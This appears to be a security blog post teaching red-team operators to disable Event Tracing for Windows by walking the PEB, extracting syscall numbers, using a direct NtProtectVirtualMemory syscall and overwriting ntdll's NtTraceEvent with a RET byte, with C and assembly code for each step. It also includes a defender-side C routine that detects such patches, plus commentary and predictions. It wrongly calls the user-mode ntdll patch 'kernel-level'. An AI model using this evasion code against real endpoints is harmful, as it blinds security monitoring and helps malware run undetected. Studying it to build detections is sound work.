Unmasking ETW: How to Bypass Windows Event Tracing with Direct Syscalls and Kernel-Level Techniques

Introduction:

Event Tracing for Windows (ETW) is a powerful kernel-level tracing mechanism that provides deep visibility into system behavior, making it a formidable obstacle for red team operators and penetration testers. Bypassing ETW is a critical technique for executing stealthy operations, as it can blind security products that rely on its telemetry. This article delves into a sophisticated method of patching the `NtTraceEvent` syscall in-memory to neutralize ETW, using direct system calls to avoid classic detection vectors.

Learning Objectives:

  • Understand the role of ETW in modern security monitoring and why bypassing it is crucial for advanced red team operations.
  • Learn how to implement direct system calls (Direct Syscalls) to evade user-land API hooking placed by EDRs.
  • Master the technique of manually parsing internal Windows structures to locate and patch critical functions in kernel memory.

You Should Know:

1. The Fundamentals of ETW and Direct Syscalls

ETW is an efficient logging mechanism that allows applications and the OS to log events. Security products consume these events to detect malicious activity. Direct Syscalls are a technique where a payload directly invokes a system call instruction (syscall/sysenter) instead of calling a function in a Windows DLL like ntdll.dll, which is often hooked by EDRs. This is the foundation of the discussed bypass.

2. Locating NtTraceEvent via Internal Windows Structures

To patch `NtTraceEvent`, you must first find its address in memory. The function is exported by ntdll.dll, so the address comes from ntdll's Export Address Table (EAT). Rather than asking the Windows API for it, a more advanced method walks the Process Environment Block (PEB) by hand to reach the loaded-module list, takes ntdll's base address from that list, and then parses the PE headers of `ntdll` to locate the function's export. This avoids using standard Windows API functions that might be monitored.

3. Crafting the Direct Syscall for NtProtectVirtualMemory

To patch the memory region containing NtTraceEvent, you need to change its permissions to writable. This is done using NtProtectVirtualMemory. A direct syscall must be crafted for this function to avoid hooks.

```asm
; Example ASM for a direct NtProtectVirtualMemory syscall (x64)
mov r10, rcx        ; the kernel expects the first argument in r10
mov eax, 50h        ; SSN for NtProtectVirtualMemory on Windows 10
syscall
ret
```

Step-by-step guide: This assembly stub is placed in your executable's memory. You load the required parameters into the registers (RCX, RDX, R8 and R9 for the first four arguments; any further arguments go on the stack, as in the normal x64 calling convention), set the System Service Number (SSN) in EAX, and execute the `syscall` instruction. This directly invokes the kernel without touching the potentially hooked `ntdll` version of the function.

4. The In-Memory Patch: Overwriting with RET

The core of the bypass is patching the `NtTraceEvent` function. The chosen patch is a single `RET` instruction (opcode 0xC3). This causes the function to return immediately when called, effectively disabling it.

```c
// C code snippet demonstrating the patch
// NtTraceEventAddr holds the address of ntdll!NtTraceEvent resolved earlier (sections 2 and 5)
unsigned char ret_opcode = 0xC3;
PVOID  base = NtTraceEventAddr;     // copy: NtProtectVirtualMemory rounds BaseAddress/RegionSize in place
SIZE_T size = sizeof(ret_opcode);
ULONG  oldProtect;
SIZE_T bytesWritten;
NtProtectVirtualMemory(GetCurrentProcess(), &base, &size, PAGE_EXECUTE_READWRITE, &oldProtect);
WriteProcessMemory(GetCurrentProcess(), NtTraceEventAddr, &ret_opcode, sizeof(ret_opcode), &bytesWritten);
NtProtectVirtualMemory(GetCurrentProcess(), &base, &size, oldProtect, &oldProtect);
```

Step-by-step guide: First, change the memory protection of the page containing `NtTraceEvent` to PAGE_EXECUTE_READWRITE. Then, write the `0xC3` byte to the start of the function. Finally, restore the original memory protection to avoid detection.

5. Evading Detection with Manual PE Parsing

Using `GetProcAddress` to find `NtTraceEvent` is a red flag. Instead, manually parse the PEB to find the base address of ntdll.dll.

```c
// C code to get ntdll base address from PEB
// Needs full PEB / LDR_DATA_TABLE_ENTRY definitions (winternl.h hides BaseDllName behind reserved fields)
HMODULE ntdllBase = NULL;
PPEB pPeb = (PPEB)__readgsqword(0x60);                       // PEB pointer lives at gs:[0x60] on x64
PLIST_ENTRY listHead = &pPeb->Ldr->InMemoryOrderModuleList;  // circular list: stop when back at the head
PLIST_ENTRY currentModule = listHead->Flink;
while (currentModule != listHead) {
    PLDR_DATA_TABLE_ENTRY moduleEntry = CONTAINING_RECORD(currentModule, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
    if (moduleEntry->BaseDllName.Buffer && wcscmp(moduleEntry->BaseDllName.Buffer, L"ntdll.dll") == 0) {
        ntdllBase = (HMODULE)moduleEntry->DllBase;
        break;
    }
    currentModule = currentModule->Flink;
}
```

Step-by-step guide: The PEB address is retrieved from the GS segment register. The `Ldr` member points to a list of loaded modules. The code iterates through this list until it finds the entry for ntdll.dll, from which it extracts the base address. This is all done without calling any API functions.

6. Calculating System Service Numbers (SSNs) Dynamically

EDRs can obscure SSNs, so hardcoding them (like `0x50` for NtProtectVirtualMemory) is unreliable. A robust implementation parses the EAT of `ntdll.dll` to find a function’s SSN by reading the `syscall` stub.

```c
// Parse ntdll's EAT to find the SSN for a given function
DWORD FindSSN(HMODULE ntdllBase, const char* funcName) {
    DWORD exportRVA = 0;
    // ... (PE parsing to find export address)
    BYTE* funcAddr = (BYTE*)((ULONG_PTR)ntdllBase + exportRVA);
    // x64 stub prologue: 4C 8B D1 (mov r10, rcx) then B8 imm32 (mov eax, SSN)
    if (funcAddr[0] == 0x4C && funcAddr[1] == 0x8B && funcAddr[2] == 0xD1 && funcAddr[3] == 0xB8) {
        return *(DWORD*)(funcAddr + 4);   // the four-byte immediate is the SSN
    }
    return (DWORD)-1;                     // prologue not as expected (hooked or unknown build)
}
```

Step-by-step guide: After finding the address of a function like `NtProtectVirtualMemory` in ntdll.dll, you disassemble its beginning. The stub starts with `mov r10, rcx` followed by `mov eax, SSN`, as in the assembly shown in section 3. This code checks for that prologue and reads the four bytes after the `0xB8` opcode to extract the SSN value for use in the direct syscall stub.
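As an added, defender-side example that is not part of the original post: the same prologue layout that `FindSSN` reads (`mov r10, rcx; mov eax, SSN`) lets an integrity check recognise the single-byte `RET` patch from section 4, as well as `JMP` detours, by classifying the first bytes of an Nt* export and diffing them against a clean copy. The stub bytes are constructed samples rather than bytes read from a real ntdll, the SSN 0x50 is the value the page quotes for Windows 10, and `classify_stub`, `read_ssn` and `first_diff` are this example's own names.

```c
#include <stdint.h>
#include <stdio.h>

/* Verdicts for the first bytes of an Nt* export in the loaded ntdll image. */
typedef enum { STUB_INTACT, STUB_RET_PATCHED, STUB_JMP_HOOKED, STUB_UNKNOWN } stub_state;
/* Classify a syscall stub prologue. Expected x64 layout, as in the page's stub:
 * 4C 8B D1 (mov r10, rcx) then B8 imm32 (mov eax, SSN). Stores the SSN if asked. */
stub_state classify_stub(const uint8_t *p, size_t len, uint32_t *ssn)
{
    if (len < 8) return STUB_UNKNOWN;
    if (p[0] == 0xC3) return STUB_RET_PATCHED;          /* ret: the section 4 patch */
    if (p[0] == 0xE9 || (p[0] == 0xFF && p[1] == 0x25)) /* jmp rel32 / jmp [rip+disp32] */
        return STUB_JMP_HOOKED;
    if (p[0] != 0x4C || p[1] != 0x8B || p[2] != 0xD1 || p[3] != 0xB8) return STUB_UNKNOWN;
    if (ssn) /* little-endian imm32 after the 0xB8 opcode */
        *ssn = (uint32_t)p[4] | ((uint32_t)p[5] << 8) | ((uint32_t)p[6] << 16) | ((uint32_t)p[7] << 24);
    return STUB_INTACT;
}
/* SSN of an intact stub, or UINT32_MAX when the prologue is not the expected one. */
uint32_t read_ssn(const uint8_t *p, size_t len)
{
    uint32_t ssn = UINT32_MAX;
    classify_stub(p, len, &ssn); /* only an intact stub overwrites the sentinel */
    return ssn;
}

/* Offset of the first byte where the loaded prologue differs from a clean copy
 * (for example the same export read from ntdll.dll on disk), or -1 if identical. */
int first_diff(const uint8_t *loaded, const uint8_t *clean, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (loaded[i] != clean[i]) return (int)i;
    return -1;
}

/* Constructed sample prologues, not bytes read from a real ntdll; 0x50 is the SSN the page quotes. */
const uint8_t clean_stub[8]  = { 0x4C, 0x8B, 0xD1, 0xB8, 0x50, 0x00, 0x00, 0x00 };
const uint8_t ret_patched[8] = { 0xC3, 0x8B, 0xD1, 0xB8, 0x50, 0x00, 0x00, 0x00 };
const uint8_t jmp_hooked[8]  = { 0xE9, 0x11, 0x22, 0x33, 0x44, 0x90, 0x90, 0x90 };

int main(void)
{
    const char *names[] = { "intact", "ret-patched", "jmp-hooked", "unknown" };
    const uint8_t *samples[] = { clean_stub, ret_patched, jmp_hooked };
    for (int i = 0; i < 3; i++)
        printf("sample %d: %s, first diff at %d, ssn 0x%X\n", i, names[classify_stub(samples[i], 8, NULL)],
               first_diff(samples[i], clean_stub, 8), read_ssn(samples[i], 8));
    return 0;
}
```

On a live system the loaded bytes would be read from the process's ntdll mapping and the clean copy from the same export in ntdll.dll on disk; any non-zero verdict or diff offset on `NtTraceEvent` is worth alerting on.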

7. Operational Security and Testing the Bypass

Deploying this technique requires caution. Test extensively in a lab environment. The bypass is volatile; a reboot or certain security products can re-enable ETW. Its primary use is during the initial execution chain of a payload to achieve temporary stealth before other persistence mechanisms are established. Always pair it with other evasion techniques for a robust defense evasion strategy.

What Undercode Says:

  • The Arms Race Escalates to Kernel Space. This technique represents a significant evolution in the cat-and-mouse game between attackers and defenders. By operating at such a low level, using direct syscalls and memory patching, attackers are effectively dismantling the foundational trust models of endpoint security, which heavily rely on user-land API monitoring.
  • Sophistication is the New Stealth. The move away from well-documented P/Invoke calls towards manual structure parsing and direct syscalls is a clear indicator of increasing sophistication in offensive tooling. This approach leaves far fewer traces for heuristic and behavioral detection systems to analyze, making pure signature-based detection utterly obsolete.

The development and sharing of such tools highlight a critical inflection point in cybersecurity. Defenders can no longer assume the integrity of user-land APIs and must look deeper for anomalies, perhaps toward kernel-level telemetry and hypervisor-based introspection. This bypass is not just a trick; it’s a statement that the most determined adversaries will go to extraordinary lengths to remain hidden. The defense community must respond by integrating more advanced, cross-layer detection capabilities that can identify the manipulation of core OS structures themselves, rather than just monitoring the APIs that interact with them.

Prediction:

The public demonstration of this low-level ETW bypass technique will rapidly catalyze its integration into mainstream offensive security frameworks like Cobalt Strike and Metasploit. Within the next 12-18 months, we predict a surge in fileless attacks that leverage these direct syscall and in-memory patching methods to achieve unprecedented levels of stealth. This will force a paradigm shift in defensive security, accelerating the adoption of Kernel-level EDRs, more widespread use of Threat Intelligence feeds that track syscall anomalies, and ultimately, a push towards hardware-isolated security features like Microsoft’s Pluton to re-establish a root of trust that is far more difficult for attackers to compromise.

IT/Security Reporter URL:

Reported By: https://lnkd.in/p/deVsvZPB – Hackers Feeds